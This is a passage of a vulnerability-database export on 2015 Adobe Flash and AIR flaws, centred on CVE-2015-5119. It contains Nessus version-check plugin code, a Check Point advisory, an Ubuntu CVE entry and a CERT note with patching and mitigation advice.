"2022-04-12T16:01:06", "description": "According to its version, the installation of Adobe AIR on the remote Windows host is equal or prior to 18.0.0.144. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. 
(CVE-2015-5124)", "cvss3": {"score": null, "vector": null}, "published": "2015-07-09T00:00:00", "type": "nessus", "title": "Adobe AIR <= 18.0.0.144 Multiple Vulnerabilities (APSB15-16)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119", "CVE-2015-5124"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB15-16.NASL", "href": "https://www.tenable.com/plugins/nessus/84641", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84641);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n 
\"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe AIR <= 18.0.0.144 Multiple Vulnerabilities (APSB15-16)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a version of Adobe AIR installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nWindows host is equal or prior to 18.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. 
(CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 18.0.0.180 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\ncutoff_version = '18.0.0.144';\nfix = '18.0.0.180';\nfix_ui = '18.0';\n\nif (ver_compare(ver:version, fix:cutoff_version) <= 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version_report, path);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:18:58", "description": "The remote Windows host is missing KB3065823. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. 
(CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. 
(CVE-2015-5124)", "cvss3": {"score": null, "vector": null}, "published": "2015-07-09T00:00:00", "type": "nessus", "title": "MS KB3065823: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119", "CVE-2015-5124"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:adobe:flash_player"], "id": "SMB_KB3065823.NASL", "href": "https://www.tenable.com/plugins/nessus/84645", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84645);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n 
\"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"MSKB\", value:\"3065823\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"MS KB3065823: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing KB3065823. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. 
(CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2755801\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/3065823/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB3065823.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# <= 
18.0.0.194\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 18 ||\n (\n iver[0] == 18 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] <= 194)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 18.0.0.203' +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:44:23", "description": "The version of Google Chrome OS on the remote mobile host is prior to 43.0.2357.132 and thus unpatched for the following vulnerabilities :\n\n - A use-after-free error exists in the opaqueBackground class in the ActionScript 3 (AS3) implementation. A remote attacker, via specially crafted Flash content, can dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2015-5122) \n - A use-after-free error exists in the BitmapData class in the ActionScript 3 (AS3) implementation. A remote attacker, via specially crafted Flash content, can dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2015-5123) \n - A flaw exists due to user-supplied input not being properly validated. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. 
(CVE-2015-5124) \n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097) \n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118) \n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431) \n - Multiple NULL pointer dereference flaws exist. (CVE-2015-3126, CVE-2015-4429) \n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114) \n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433) \n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119) \n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116) \n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. 
(CVE-2015-5124)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-25T00:00:00", "type": "nessus", "title": "Google Chrome OS < 43.0.2357.132 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5122", "CVE-2015-5123", "CVE-2015-5124", "CVE-2015-3097"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:o:google:chrome_os:*:*:*:*:*:*:*:*"], "id": "8886.PRM", "href": "https://www.tenable.com/plugins/nnm/8886", "sourceData": "Binary data 8886.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:47:01", "description": "A vulnerability exists within Adobe Flash Player ActionScript 3 ByteArray class. 
A successful exploitation can allow a remote attacker to execute arbitrary code on a vulnerable system.", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash ActionScript 3 ByteArray Use After Free (APSA15-03: CVE-2015-5119)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2015-10-14T00:00:00", "id": "CPAI-2015-0806", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:49:18", "description": "Use-after-free vulnerability in the ByteArray class in the ActionScript 3\n(AS3) implementation in Adobe Flash Player 13.x through 13.0.0.296 and 14.x\nthrough 18.0.0.194 on Windows and OS X and 11.x through 11.2.202.468 on\nLinux allows remote attackers to execute arbitrary code or cause a denial\nof service (memory corruption) via crafted Flash content that overrides a\nvalueOf function, as exploited in the wild in July 2015.", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "ubuntucve", "title": "CVE-2015-5119", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T00:00:00", "id": "UB:CVE-2015-5119", "href": "https://ubuntu.com/security/CVE-2015-5119", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2021-09-28T17:52:18", "description": "### Overview\n\nAdobe Flash Player contains a vulnerability in the ActionScript 3 ByteArray class, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\nAdobe Flash Player versions 9.0 through version 18.0.0.194 contain a use-after-free vulnerability in the [AS3 ByteArray class](<http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/ByteArray.html>). This can allow attacker-controlled memory corruption. Exploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact\n\nAn attacker can execute arbitrary code in the context of the user running Flash Player. Attacks typically involve enticing a user to visit a web site containing specially-crafted Flash content, or to open a specially-crafted Microsoft Office document. \n \n--- \n \n### Solution\n\n**Apply an update**\n\nThis issue is addressed in Flash Player Desktop 18.0.0.203. Please see [Adobe Security Bulletin APSB15-16](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>) for more details and fix versions for other platforms. \n \n--- \n \n**Do not run untrusted Flash content** \n \nTo defend against this and other, as yet unknown vulnerabilities, disable Flash in your browser or enable [Click-to-Play](<http://www.howtogeek.com/188059/how-to-enable-click-to-play-plugins-in-every-web-browser>) features. Adobe has also provided instructions for how to [uninstall Flash on Windows](<https://helpx.adobe.com/flash-player/kb/uninstall-flash-player-windows.html>) and [Mac](<https://helpx.adobe.com/flash-player/kb/uninstall-flash-player-mac-os.html>) platforms. 
\n \n**Use the Microsoft Enhanced Mitigation Experience Toolkit** \n \nThe [Microsoft Enhanced Mitigation Experience Toolkit](<http://www.microsoft.com/emet>) (EMET) can be used to help prevent exploitation of this vulnerability. In particular, Attack Surface Reduction (ASR) can be configured to help restrict Microsoft Office and Internet Explorer from loading the Flash ActiveX control. \n \n--- \n \n### Vendor Information\n\n561288\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Adobe Affected\n\nNotified: July 06, 2015 Updated: July 08, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 7.1 | E:H/RL:W/RC:C \nEnvironmental | 7.1 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>\n * <https://helpx.adobe.com/security/products/flash-player/apsa15-03.html>\n * <https://twitter.com/w3bd3vil/status/618168863708962816>\n * <http://malware.dontneedcoffee.com/2015/07/hackingteam-flash-0d-cve-2015-xxxx-and.html>\n * <http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/ByteArray.html>\n * <http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/>\n * <http://www.microsoft.com/emet>\n\n### Acknowledgements\n\nThis vulnerability was discovered by HackingTeam.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE 
